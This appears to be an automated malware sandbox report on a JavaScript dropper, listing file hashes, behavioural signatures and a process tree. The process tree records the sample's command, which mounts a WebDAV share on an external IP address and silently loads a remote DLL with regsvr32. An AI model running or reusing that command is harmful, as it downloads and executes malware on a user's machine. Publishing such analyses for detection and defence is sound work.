Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21/07/2024, 16:11
Static task
static1
Behavioral task
behavioral1
Sample
6102202112270128923.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
6102202112270128923.js
Resource
win10v2004-20240709-en
General
-
Target
6102202112270128923.js
-
Size
4KB
-
MD5
512023f6f2b77dff9803686e73521ee1
-
SHA1
2266f50a218d4f9af3f1082d128cefc5a04f367b
-
SHA256
a0ba452910c0f3cf2fb29addaca8cd750137b0917170e74546a7ae9c3f75fb42
-
SHA512
87c5240076ee71bc0c4261bfdc6871f93845c00237c879360793f41a921fbf290ee4be601c0fb7785e303bc2ca071bda75306f2c54ece21e1fa4e6010b3490f2
-
SSDEEP
96:lgh9DZrmyA1zNAPDYuiAAL0llZAkjkiAAL0llZVEDe:lg7DtmyA1xAra0llZAkjka0llZf
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4044 wrote to memory of 3376 4044 wscript.exe 84 PID 4044 wrote to memory of 3376 4044 wscript.exe 84 PID 3376 wrote to memory of 2492 3376 cmd.exe 86 PID 3376 wrote to memory of 2492 3376 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\6102202112270128923.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\13840274634514.dll2⤵
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:2492
-
-